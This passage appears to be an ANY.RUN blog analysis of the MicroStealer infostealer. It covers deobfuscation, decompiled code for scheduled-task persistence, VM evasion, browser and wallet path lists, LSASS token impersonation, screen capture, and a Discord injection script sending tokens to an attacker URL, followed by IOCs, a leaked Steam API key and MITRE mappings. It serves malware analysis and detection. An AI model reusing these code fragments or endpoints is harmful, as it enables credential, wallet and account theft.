private static void lambda$checkEnvironment$1(String str) throws Exception { 
    int iD = a.d(); 
    String[] strArr = new String[a(0x5e23, 0x6709cb2b9951dedeL)]; 
    strArr[0] = a((int) 0xfffff707, (int) 0xfffff6e2); 
    strArr[1] = a((int) 0xfffff636, (int) 0xffff90f5); 
    strArr[2] = a((int) 0xfffff6c2, (int) 0xfffff530); 
     
    // ... 
 
    ?? AnyMatch = iD; 
    AnyMatch = Arrays.asList(strArr).stream().anyMatch((v1) -> { 
        return lambda$null$0(r1, v1); 
    }); 
} 

After identifying this characteristic pattern, we examined the header of the .class file to look for traces of the obfuscator in use, and immediately found ZKM (Zelix KlassMaster) v21.0.0.

The presence of the ZKM (Zelix KlassMaster) v21.0.0
The presence of the ZKM (Zelix KlassMaster) v21.0.0 obfuscator string in the Java class constant pool confirms its use 

There are already several effective public deobfuscators available for this version of ZKM. In this case, Threadtear was used with a set of ZKM-focused modules, including string deobfuscation, access restoration, flow deobfuscation, and several additional modules for bytecode cleanup. After successful deobfuscation, the analysis proceeded to the malware’s core functionality.

Overview of MicroStealer Capabilities 

After deobfuscation, the code became significantly more readable, although not entirely; some parts of the logic still remain convoluted. Even so, the core functionality of MicroStealer is already open to analysis. Let us look at its modules in more detail:

Persistence 

Persistence is implemented through the Windows Task Scheduler

private void a() throws InterruptedException, IOException { 
    String string = System.getenv("LOCALAPPDATA"); 
    string = System.getProperty("user.home") + "\AppData\Local"; 
    String string2 = string + "\model\jre\bin\miicrosoft.exe"; 
    String string3 = string + "\soft.jar"; 
    String string4 = System.getProperty("user.name"); 
    String string5 = "App_" + string4; 
    String string6 = String.format("schtasks /create /tn "%s" /tr "\"%s\" -jar \"%s\"" /sc ONLOGON /delay 0000:05 /rl HIGHEST /f", string5, string2, string3); 
    Process process = Runtime.getRuntime().exec(string6); 
    process.waitFor(); 
} 

The command creates a task in Windows Task Scheduler with the ONLOGON trigger (executed when the user logs in), a 5-second delay, and highest privileges (HIGHEST). As a result, the malwareautomatically resumes operation even after the system is rebooted. 

Virtual Machine Detection 

MicroStealer checks the execution environment for processes and services typically associated with virtual machines. If at least one match is found, execution is terminated immediately.

Despite these anti-analysis checks, the sample executes successfully in the ANY.RUN sandbox, allowing its behavior to be fully exposed during analysis.

Stop paying for incidents that could be prevented

Expose threats that bypass traditional security controls
 



Integrate in your SOC


This makes it possible to observe the malware’s logic in action and extract valuable IOCs for further detection and threat hunting. 

private static void checkEnvironment(String str) throws Exception { 
    String[] strArr = new String[13]; 
    strArr[0]  = "vmwaretray"; 
    strArr[1]  = "vmwareuser"; 
    strArr[2]  = "vgauthservice"; 
    strArr[3]  = "vmacthlp"; 
    strArr[4]  = "vmsrvc"; 
    strArr[5]  = "vmusrvc"; 
    strArr[6]  = "vmtoolsd"; 
    strArr[7]  = "vboxservice"; 
    strArr[8]  = "vboxtray"; 
    strArr[9]  = "qemu-ga"; 
    strArr[10] = "xenservice"; 
    strArr[11] = "prl_cc"; 
    strArr[12] = "prl_tools"; 
 
    boolean anyMatch = Arrays.asList(strArr) 
        .stream() 
        .anyMatch(v1 -> str.toLowerCase().contains(v1)); 
 
    if (anyMatch) { 
        Runtime.getRuntime().halt(0); 
    } 
} 

Browser Data Theft 

MicroStealer supports a wide range of Chromium-based browsers, as well as Opera and Opera GX. For each detected browser, it accesses the user’s profile data and then extracts protected information using Windows DPAPI.

put("Chrome", localAppData + "\Google\Chrome\User Data"); 
put("Brave", localAppData + "\BraveSoftware\Brave-Browser\User Data"); 
put("Edge", localAppData + "\Microsoft\Edge\User Data"); 
put("Vivaldi", localAppData + "\Vivaldi\User Data"); 
put("Yandex", localAppData + "\Yandex\YandexBrowser\User Data"); 
put("Chromium", localAppData + "\Chromium\User Data"); 
// ... 
 
put("Opera", appData + "\Opera Software\Opera Stable"); 
put("Opera GX", appData + "\Opera Software\Opera GX Stable"); 

Interaction with LSASS 

When LSA protection is disabled (RunAsPPL = 0), the malware attempts to obtain elevated privileges by interacting with the lsass.exe process. It enables SeDebugPrivilege, searches for LSASS in the process list, and then duplicates its security token and impersonates the token in the current thread:

Advapi32Util.registryGetIntValue(HKEY_LOCAL_MACHINE,  
    "SYSTEM\CurrentControlSet\Control\Lsa", "RunAsPPL"); 
 
af.INSTANCE.RtlAdjustPrivilege(SeDebugPrivilege, true, false, intByReference); 
 
WinNT.HANDLE snapshot = Kernel32.INSTANCE.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 
while (Kernel32.INSTANCE.Process32Next(snapshot, processEntry)) { 
    if ("lsass.exe".equalsIgnoreCase(Native.toString(processEntry.szExeFile))) { 
        HANDLE hProcess = Kernel32.INSTANCE.OpenProcess(PROCESS_QUERY_INFORMATION, false, processEntry.th32ProcessID); 
         
        Advapi32.INSTANCE.OpenProcessToken(hProcess, TOKEN_DUPLICATE, tokenHandle); 
        Advapi32.INSTANCE.DuplicateToken(tokenHandle.getValue(), SecurityImpersonation, duplicatedToken); 
        Advapi32.INSTANCE.ImpersonateLoggedOnUser(duplicatedToken.getValue()); 
        break; 
    } 
} 

Screen Capture 

The malware captures the user’s current screen using java.awt.Robot. The resulting image is saved in PNG format and then packaged into a ZIP archive for later exfiltration.

Robot robot = new Robot(); 
Rectangle screen = new Rectangle(Toolkit.getDefaultToolkit().getScreenSize()); 
BufferedImage screenshot = robot.createScreenCapture(screen); 
ImageIO.write(screenshot, "png", new File("screenshot.png")); 

Additional MicroStealer Functionality 

MicroStealer targets both browser-based cryptocurrency wallet extensions (via Local Extension Settings) and desktop wallet applications. The wallet files are copied in full, without any additional processing.

put("Metamask", "\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn"); 
put("Phantom", "\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa"); 
put("Trust Wallet", "\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph"); 
put("Coinbase", "\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad"); 
// ... 
 
put("Exodus", appData + "\Exodus\exodus.wallet"); 
put("Electrum", appData + "\Electrum\wallets"); 
put("AtomicWallet", appData + "\atomic\Local Storage\leveldb"); 
put("Ethereum", appData + "\Ethereum\keystore"); 
put("Jaxx", appData + "\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb"); 
// ... 

JavaScript code is injected into the Discord desktop application, using Webpack Chunk Injection to access internal client modules and the Chrome DevTools Protocol (CDP) to intercept network requests and monitor user activity. 

const { session, BrowserWindow } = require('electron'); 
const C = { webhook: { url: 'https://78smp.com/m/' } }; 
 
// token extraction from webpack 
window.webpackChunkdiscord_app.push([ 
    [Math.random()], {}, 
    (r) => { 
        for (const mid in r.c) { 
            const getToken = r.c[mid]?.exports?.default?.getToken; 
            if (typeof getToken === 'function') return getToken(); 
        } 
    } 
]); 
 
// CDP-based network interception 
w.webContents.debugger.attach('1.3'); 
w.webContents.debugger.on('message', async (_, m, p) => { 
    // /auth/login, /mfa/totp, /users/@me 
    // exfiltration to Discord webhook 
}); 

The malware intercepts events related to logins, credential changes, 2FA enablement, and the addition of payment methods such as Stripe and Braintree/PayPal. In addition, it collects account metadata such as badges, Nitro level, and similar attributes, which may indicate an attempt to profile victims.

Steam Account Profiling 

The malware also collects information about the victim’s Steam account. Using a hardcoded API key, the stealer queries the Steam Web API to retrieve the profile level, number of owned games, and account creation date. 

While this information does not provide direct access to the account on its own, it may be used to assess the victim’s value and prioritize targets, similarly to the profiling observed in Discord.

String apiKey = "440D7F4D810EF9298D25EDDF37C1F902"; 
 
String levelUrl = String.format( 
    "https://api.steampowered.com/IPlayerService/GetSteamLevel/v1/?key=%s&steamid=%s", 
    apiKey, steamId 
); 
 
String gamesUrl = String.format( 
    "https://api.steampowered.com/IPlayerService/GetOwnedGames/v1/?key=%s&steamid=%s", 
    apiKey, steamId 
); 
 
String summaryUrl = String.format( 
    "https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=%s&steamids=%s", 
    apiKey, steamId 
); 

Detecting MicroStealer Early: A Practical Investigation Loop 

MicroStealer highlights a familiar problem for many security teams: new malware families often appear before reliable signatures or threat intelligence become widely available.

When that happens, defenders are left with suspicious files, unclear alerts, and limited external context. Without fast verification, attackers can quietly collect credentials, session tokens, and other sensitive data while investigations stall. 

Early detection depends on how quickly a team can move from uncertain signals to confirmed malicious behavior

1. Monitoring: Spot Suspicious Infrastructure Early 

Infostealers often rely on external services and fresh infrastructure for data exfiltration. In the case of MicroStealer, stolen information is transmitted through Discord webhooks and attacker-controlled servers.

Monitoring for newly observed infrastructure and suspicious connections can help teams catch early signs of compromise before the malware fully completes its collection and exfiltration stages. 

ANY.RUN’s Threat Intelligence Feeds continuously surface newly observed indicators based on telemetry and submissions from 15,000+ organizations and 600,000+ security professionals

100% actionable IOCs delivered by TI Feeds to your existing stack 

For SOC teams, this means fewer blind spots in monitoring and earlier visibility into suspicious domains, IPs, and attacker infrastructure. 

99% unique
threat data for your SOC
Catch attacks early to protect your business
 



Integrate TI Feeds


2. Triage: Confirm Behavior Instead of Guessing 

New malware families like MicroStealer often lack clear static signatures or reliable reputation data, which slows down traditional investigation workflows.

Instead of relying only on static verdicts, analysts can quickly confirm what a suspicious file actually does by executing it in a controlled environment. 

Running the sample in the ANY.RUN interactive sandbox reveals the full execution chain, including: 

  • NSIS installer delivering the payload 
  • Electron loader extracting the JAR module
  • Java stealer executing its data collection logic  
  • Attempts to steal browser credentials and wallet data 
  • Communication with Discord webhooks and external servers 
Relevant IOCs automatically gathered in one tab inside ANY.RUN sandbox

Within minutes, analysts can observe the complete attack chain, extract reliable IOCs, and determine whether the sample poses a real threat.

For SOC teams, this replaces guesswork with behavior-based evidence, helping reduce investigation time and avoid unnecessary escalations.

74% of Fortune 100 companies
rely on ANY.RUN
for earlier detection and faster SOC response
 



Power your SOC now


3. Threat Hunting: Expand Detection from One Sample 

Once a stealer like MicroStealer is confirmed, the next step is ensuring it does not appear elsewhere in the environment

Using Threat Intelligence Lookup, analysts can pivot from the initial indicators to discover related infrastructure, connected samples, and similar activity patterns. 

This allows teams to: 

  • identify related domains and IP addresses 
  • find other samples using the same infrastructure 
  • detect variants using the same delivery chain 

threatName:”microstealer” 

ANY.RUN TI Lookup demonstrates relevant sandbox sessions with MicroStealer 
ANY.RUN TI Lookup demonstrates relevant sandbox sessions with MicroStealer 

By pivoting across infrastructure and behavior, organizations can transform a single investigation into broader detection coverage across the environment

Conclusion: Faster Clarity Means Lower Risk 

MicroStealer demonstrates how modern infostealers combine layered delivery chains, heavy obfuscation, and anti-analysis techniques to slow down detection. 

However, even complex malware becomes manageable when teams can quickly move from uncertain alerts to clear behavioral evidence. 

By combining early monitoring, fast behavioral triage, and targeted threat hunting, security teams can uncover emerging threats faster, reduce investigation time, and limit the risk of data theft inside corporate environments. 

Bring speed and clarity to your SOC with ANY.RUN ➜ 

About ANY.RUN 

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, fits naturally into modern SOC workflows and supports investigations from initial alert to final containment. 

The platform allows teams to safely execute suspicious files and URLs, observe real behavior in an interactive environment, enrich indicators with immediate context through TI Lookup, and continuously monitor emerging infrastructure using Threat Intelligence Feeds. Together, these capabilities help reduce uncertainty, accelerate triage, and limit unnecessary escalations across the SOC. 

ANY.RUN also meets enterprise security and compliance expectations. The company is SOC 2 Type II certified, reinforcing its commitment to protecting customer data and maintaining strong security controls.

Indicators of Compromise (IOCs)   

Analyzed Files 

Name  MD5  SHA1  SHA256 
RocobeSetup.exe (NSIS Installer)  23A705FA71DA6A9191618AEDC1144C4A  755C21DD36A49086F98C87A172B900E6424F467A  9CF1D4F87D9F2EDF53CE681B59C209F57A805E6157693E784D9D946FC3B17A04 
Game Launcher.exe (Electron)  A137BF79A2D5F1C8104AF40EC93E4E66  C83D75BF9F9FDA4E6EF7B2C575BC9D3D82D6590B  05F0C8E89248D3477115D9F62B20CA8A95D925140C727E975AB9F3025A5AD01D 
soft.jar (MicroStealerCore)  04EA30CD1B74E2844BE939BD1FFE0084  B7D0F8954BAFAB5E79AE96C07E683C229C9F7B72  DF5E2B824C0FD40323A46019BFBC325F89B5B68697ED3C94B52189CF90E1BEC4 

Network indicators 

HTTPS Request: 

https[:]//78smp[.]com/m/ 

https[:]//discord[.]com/api/webhooks/1460660027969896695/FQ2nam1vUVDwLbiTZCPen9C53eBMg_qB3-z8pGRtZ3ZerbyflDnzfmJVLpgElxMNfO41 

Domains: 

vrcpluginhub[.]com 

buradakimvar[.]com 

kittenscraft[.]com 

dashlune[.]xyz 

buradabmwking[.]com 

crushfall[.]com 

slumpcute[.]com  

banterplugins[.]com 

velyonar[.]com 

churilend[.]com 

zarvethion[.]com 

kittiesmc[.]com 

kittycraftmc[.]com 

welarith[.]com 

eldrynworld[.]com 

API Keys

Steam Web API Key: 440D7F4D810EF9298D25EDDF37C1F902 

MITRE ATT&CK Techniques 

Tactic  Technique  Description 
TA0002: Execution  T1204.002: User Execution: Malicious File  User runs NSIS installer / Game Launcher 
  T1059.001: PowerShell  PowerShell script with Start-Process -Verb RunAs for UAC 
  T1059.003: Windows Command Shell  schtasks used to create ONLOGON task 
TA0003: Persistence  T1053.005: Scheduled Task/Job: Scheduled Task  Task App_, ONLOGON, HIGHEST, 5s delay 
TA0004: Privilege Escalation  T1548.002: Abuse Elevation Control Mechanism: Bypass User Account Control  UAC prompt for elevation (social engineering) 
  T1134.001: Access Token Manipulation: Token Impersonation/Theft  DuplicateToken / ImpersonateLoggedOnUser on LSASS token 
TA0005: Defense Evasion  T1027: Obfuscated Files or Information  Node.js obfuscation + ZKM in JAR 
  T1036.005: Masquerading: Match Legitimate Resource Name or Location  miicrosoft.exe, Game Launcher naming 
  T1497.001: Virtualization/Sandbox Evasion: System Checks  Process list check for VMware, VBox, QEMU, etc. 
TA0006: Credential Access  T1555.003: Credentials from Password Stores: Credentials from Web Browsers  Chromium/Opera: passwords, autofill via DPAPI 
  T1539: Steal Web Session Cookie  Browser cookies extraction (session hijacking) 
  T1552.001: Unsecured Credentials: Credentials InFiles  Wallet files and browser extension storage 
  T1003.001: OS Credential Dumping: LSASS Memory  LSASS access when RunAsPPL=0, token duplicate 
TA0007: Discovery  T1082: System Information Discovery  Collects hostname, OS, username, env vars for exfil report 
TA0009: Collection  T1113: Screen Capture  Screenshot via java.awt.Robot, PNG 
  T1560.001: Archive Collected Data: Archive via Utility  ZIP before exfiltration 
TA0010: Exfiltration  T1567.004: Exfiltration Over Web Service: Exfiltration Over Webhook  Data sent to Discord/webhook 
TA0011: Command and Control  T1071.001: Application Layer Protocol: Web Protocols  HTTPS to C2 / webhooks 

The post MicroStealer Analysis: A Fast-Spreading Infostealer with Limited Detection  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More